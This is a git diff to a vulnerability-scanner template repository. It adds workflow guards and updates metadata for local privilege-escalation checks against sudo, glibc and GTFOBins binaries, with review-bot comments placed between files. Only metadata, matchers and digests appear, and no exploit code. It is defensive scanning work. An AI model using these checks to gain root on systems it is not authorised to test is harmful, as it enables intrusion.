diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml deleted file mode 100644 index 1432e0b73f..0000000000 --- a/.github/workflows/cache-purge.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: 🗑️ Cache Purge - -on: - push: - tags: - - '*' - workflow_dispatch: - -jobs: - deploy: - runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' - steps: - # Wait for 5 minutes - - name: Wait for 2 minutes - run: sleep 120 - - - name: Purge cache - uses: jakejarvis/cloudflare-purge-action@master - env: - CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }} - CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }} \ No newline at end of file diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index 96947c547c..e538a4a805 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 - name: Yamllint diff --git a/.github/workflows/template-sign.yml b/.github/workflows/template-sign.yml index e61b2d7f09..3e2daae036 100644 --- a/.github/workflows/template-sign.yml +++ b/.github/workflows/template-sign.yml @@ -11,6 +11,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 0df4a5ea3c..13a64741d8 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 897666522d..6f25ab5bff 100644 --- a/.github/workflows/templates-stats.yml 
+++ b/.github/workflows/templates-stats.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f5db5acabc..396d848f79 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-42344.yaml' - 'http/cves/2023/CVE-2023-45671.yaml' - 'http/cves/2023/CVE-2023-48777.yaml' + - 'http/cves/2023/CVE-2023-6895.yaml' - 'http/cves/2024/CVE-2024-0305.yaml' - 'http/cves/2024/CVE-2024-0713.yaml' - 'http/cves/2024/CVE-2024-1021.yaml' @@ -25,7 +26,9 @@ on: - 'http/default-logins/ibm/ibm-dcec-default-login.yaml' - 'http/default-logins/ibm/ibm-dsc-default-login.yaml' - 'http/default-logins/ibm/ibm-hmc-default-login.yaml' + - 'http/default-logins/ibm/imm-default-login.yaml' - 'http/exposed-panels/c2/meduza-stealer.yaml' + - 'http/exposed-panels/cisco-unity-panel.yaml' - 'http/exposed-panels/connectwise-panel.yaml' - 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml' - 'http/exposed-panels/ibm/ibm-dcec-panel.yaml' @@ -38,6 +41,7 @@ on: - 'http/exposed-panels/opinio-panel.yaml' - 'http/exposed-panels/rocketchat-panel.yaml' - 'http/exposures/configs/sphinxsearch-config.yaml' + - 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml' - 'http/misconfiguration/installer/connectwise-setup.yaml' - 'http/technologies/ibm/ibm-decision-runner.yaml' - 'http/technologies/ibm/ibm-decision-server-runtime.yaml' @@ -49,6 +53,7 @@ on: workflow_dispatch: jobs: triggerRemoteWorkflow: + if: github.repository == 'projectdiscovery/nuclei-templates' runs-on: ubuntu-latest steps: - name: Trigger Remote Workflow with curl diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index ac59e51074..649e928454 100644 --- a/.github/workflows/wordpress-plugins-update.yml 
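Review bot: The job-level guard `if: github.repository == 'projectdiscovery/nuclei-templates'` is inserted above `runs-on` in the `triggerRemoteWorkflow` job, whereas the same guard is placed after `runs-on` in syntax-checking.yml, template-sign.yml, template-validate.yml, templates-stats.yml and wordpress-plugins-update.yml in this commit. Both positions are valid YAML, but keeping the key order identical across the workflows makes the guard easy to audit at a glance. A smaller point: the `push.paths` entries added here duplicate the lines added to `.new-additions`; if one list is generated from the other that is fine, otherwise the two will drift.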
+++ b/.github/workflows/wordpress-plugins-update.yml @@ -6,6 +6,7 @@ on: jobs: Update: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Check out repository code uses: actions/checkout@v4 diff --git a/.new-additions b/.new-additions index 48466dad65..867ea6a73d 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml http/cves/2023/CVE-2023-42344.yaml http/cves/2023/CVE-2023-45671.yaml http/cves/2023/CVE-2023-48777.yaml +http/cves/2023/CVE-2023-6895.yaml http/cves/2024/CVE-2024-0305.yaml http/cves/2024/CVE-2024-0713.yaml http/cves/2024/CVE-2024-1021.yaml @@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml http/default-logins/ibm/ibm-dcec-default-login.yaml http/default-logins/ibm/ibm-dsc-default-login.yaml http/default-logins/ibm/ibm-hmc-default-login.yaml +http/default-logins/ibm/imm-default-login.yaml http/exposed-panels/c2/meduza-stealer.yaml +http/exposed-panels/cisco-unity-panel.yaml http/exposed-panels/connectwise-panel.yaml http/exposed-panels/fortinet/fortiauthenticator-detect.yaml http/exposed-panels/ibm/ibm-dcec-panel.yaml @@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml http/exposed-panels/opinio-panel.yaml http/exposed-panels/rocketchat-panel.yaml http/exposures/configs/sphinxsearch-config.yaml +http/misconfiguration/cloudflare-rocketloader-htmli.yaml http/misconfiguration/installer/connectwise-setup.yaml http/technologies/ibm/ibm-decision-runner.yaml http/technologies/ibm/ibm-decision-server-runtime.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index ddaae06f78..65c1838471 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -32,3 +32,6 @@ files: - http/cves/2020/CVE-2020-28351.yaml - http/vulnerabilities/oracle/oracle-ebs-xss.yaml - http/cves/2021/CVE-2021-28164.yaml + - http/fuzzing/wordpress-themes-detect.yaml + - http/fuzzing/mdb-database-file.yaml + - http/fuzzing/iis-shortname.yaml \ No newline at end of file 
diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 7383293454..2a8c21ffbb 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -9,11 +9,22 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 - https://www.exploit-db.com/exploits/47502 + - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html + - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html + - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-14287 + cwe-id: CWE-755 + epss-score: 0.34299 + epss-percentile: 0.96958 + cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - vendor: canonical - product: ubuntu_linux + vendor: sudo_project + product: sudo tags: cve,cve2019,sudo,code,linux,privesc,local,canonical self-contained: true @@ -36,4 +47,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 3004515a10..ff8dab6fe8 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml 
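Review bot: The `tags` line still carries `canonical` although this hunk switches `vendor` from `canonical` to `sudo_project` and `product` from `ubuntu_linux` to `sudo`, so the tag now disagrees with the metadata it mirrors. Suggest dropping it, or replacing it so the line reads `tags: cve,cve2019,sudo,code,linux,privesc,local,sudo_project`, unless `canonical` is kept deliberately for search continuity. The second hunk only updates the signature digest.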
@@ -10,8 +10,20 @@ info: - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435 - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff + - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html + - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3156 + cwe-id: CWE-193 + epss-score: 0.97085 + epss-percentile: 0.99752 + cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true + vendor: sudo_project + product: sudo tags: cve,cve2021,sudo,code,linux,privesc,local,kev self-contained: true @@ -28,4 +40,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 8554bd8a9d..ea23ad4579 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.8 cve-id: CVE-2023-2640 cwe-id: CWE-863 - epss-score: 0.00047 - epss-percentile: 0.14754 + epss-score: 0.00174 + epss-percentile: 0.53697 cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* metadata: verified: true 
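Review bot: The added reference `http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html` is, going by its title, an advisory about the glibc syslog overflow rather than this sudo issue; it was presumably pulled in from NVD cross-references, but it will mislead readers of a CVE-2021-3156 template. Either drop it or keep only references that describe the sudo bug. The remaining additions (classification block, `vendor: sudo_project`, `product: sudo`) are consistent with the CVE-2019-14287 change in this commit.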
@@ -54,4 +54,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index 130d2597cb..d96f5b0e87 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -10,16 +10,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-4911 - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt - https://www.youtube.com/watch?v=1iV-CD9Apn8 + - http://www.openwall.com/lists/oss-security/2023/10/05/1 + - http://www.openwall.com/lists/oss-security/2023/10/13/11 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-4911 - cwe-id: CWE-787 - cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:* + cwe-id: CWE-787,CWE-122 + epss-score: 0.0171 + epss-percentile: 0.87439 + cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local + vendor: gnu + product: glibc + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev self-contained: true code: 
@@ -34,4 +39,4 @@ code: - type: word words: - "139" # Segmentation Fault Exit Code -# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index d4dc164656..25c06d08fb 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -9,15 +9,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6246 - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt + - https://access.redhat.com/security/cve/CVE-2023-6246 + - https://bugzilla.redhat.com/show_bug.cgi?id=2249053 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/ classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-6246 - cwe-id: CWE-787 + cwe-id: CWE-787,CWE-122 + epss-score: 0.00383 + epss-percentile: 0.72435 cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: glibc + vendor: gnu + product: glibc tags: cve,cve2023,code,glibc,linux,privesc,local self-contained: true 
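Review bot: The exit-code matcher in this template's second hunk (`@@ -33,4 +39,4 @@`, a context line) reads `- "127" # Segmentation Fault Exit Code`, but 127 is conventionally a shell's command-not-found status, while a process killed by SIGSEGV exits with 139 — the value the sibling CVE-2023-4911 template in this same commit matches under the same comment. Either the comment or the expected value looks wrong; confirm against an actual run before the digest is re-signed. The metadata hunk itself (`vendor: gnu`, `product: glibc`, the EPSS and CWE additions) raises nothing.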
@@ -33,4 +39,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-choom.yaml b/code/privilege-escalation/linux/binary/privesc-choom.yaml index e1ace50aba..fa9675d582 100644 --- a/code/privilege-escalation/linux/binary/privesc-choom.yaml +++ b/code/privilege-escalation/linux/binary/privesc-choom.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/choom/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,choom,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-find.yaml b/code/privilege-escalation/linux/binary/privesc-find.yaml index 83be694188..ed1fd52b51 100644 --- a/code/privilege-escalation/linux/binary/privesc-find.yaml +++ b/code/privilege-escalation/linux/binary/privesc-find.yaml 
@@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/find/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,find,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-lua.yaml b/code/privilege-escalation/linux/binary/privesc-lua.yaml index c5d43374de..341fbb7fa5 100644 --- a/code/privilege-escalation/linux/binary/privesc-lua.yaml +++ b/code/privilege-escalation/linux/binary/privesc-lua.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/lua/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,lua,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-mysql.yaml b/code/privilege-escalation/linux/binary/privesc-mysql.yaml index 6865f91dbf..50a454b6d9 100644 
--- a/code/privilege-escalation/linux/binary/privesc-mysql.yaml +++ b/code/privilege-escalation/linux/binary/privesc-mysql.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/mysql/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,mysql,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-node.yaml b/code/privilege-escalation/linux/binary/privesc-node.yaml index ebb32c926c..26c6458229 100644 --- a/code/privilege-escalation/linux/binary/privesc-node.yaml +++ b/code/privilege-escalation/linux/binary/privesc-node.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/node/ metadata: - max-request: 4 verified: true + max-request: 4 tags: code,linux,node,privesc,local self-contained: true @@ -53,4 +53,4 @@ code: - 'contains(code_3_response, "root")' - 'contains(code_4_response, "root")' condition: or -# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privesc-rc.yaml b/code/privilege-escalation/linux/binary/privesc-rc.yaml index 8136f4c0bf..8062db6e4f 100644 --- a/code/privilege-escalation/linux/binary/privesc-rc.yaml +++ b/code/privilege-escalation/linux/binary/privesc-rc.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/rc/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,rc,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-run-parts.yaml b/code/privilege-escalation/linux/binary/privesc-run-parts.yaml index 31b208a6d7..4cf9ce7a08 100644 --- a/code/privilege-escalation/linux/binary/privesc-run-parts.yaml +++ b/code/privilege-escalation/linux/binary/privesc-run-parts.yaml @@ -8,8 +8,8 @@ info: The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner. reference: https://gtfobins.github.io/gtfobins/run-parts/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,run-parts,privesc,local self-contained: true 
@@ -45,4 +45,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-strace.yaml b/code/privilege-escalation/linux/binary/privesc-strace.yaml index e5a895596b..8f316ba816 100644 --- a/code/privilege-escalation/linux/binary/privesc-strace.yaml +++ b/code/privilege-escalation/linux/binary/privesc-strace.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/strace/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,strace,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-torify.yaml b/code/privilege-escalation/linux/binary/privesc-torify.yaml index 51eb949675..93ce6aa580 100644 --- a/code/privilege-escalation/linux/binary/privesc-torify.yaml +++ b/code/privilege-escalation/linux/binary/privesc-torify.yaml 
@@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/torify/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,torify,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-view.yaml b/code/privilege-escalation/linux/binary/privesc-view.yaml index 67551216c4..5accdeea7e 100644 --- a/code/privilege-escalation/linux/binary/privesc-view.yaml +++ b/code/privilege-escalation/linux/binary/privesc-view.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/view/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,view,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-xargs.yaml b/code/privilege-escalation/linux/binary/privesc-xargs.yaml index 23db34f78b..2ed01bb5a3 100644 
--- a/code/privilege-escalation/linux/binary/privesc-xargs.yaml +++ b/code/privilege-escalation/linux/binary/privesc-xargs.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/xargs/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,xargs,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/rw-shadow.yaml b/code/privilege-escalation/linux/rw-shadow.yaml index 0fee852708..0a004a3a05 100644 --- a/code/privilege-escalation/linux/rw-shadow.yaml +++ b/code/privilege-escalation/linux/rw-shadow.yaml @@ -7,8 +7,8 @@ info: reference: - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow metadata: - max-request: 2 verified: true + max-request: 2 tags: code,linux,privesc,local self-contained: true @@ -42,4 +42,4 @@ code: words: - "Not readable and not writable" negative: true -# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index f9d5082a95..58062848e9 100644 --- a/cves.json +++ b/cves.json 
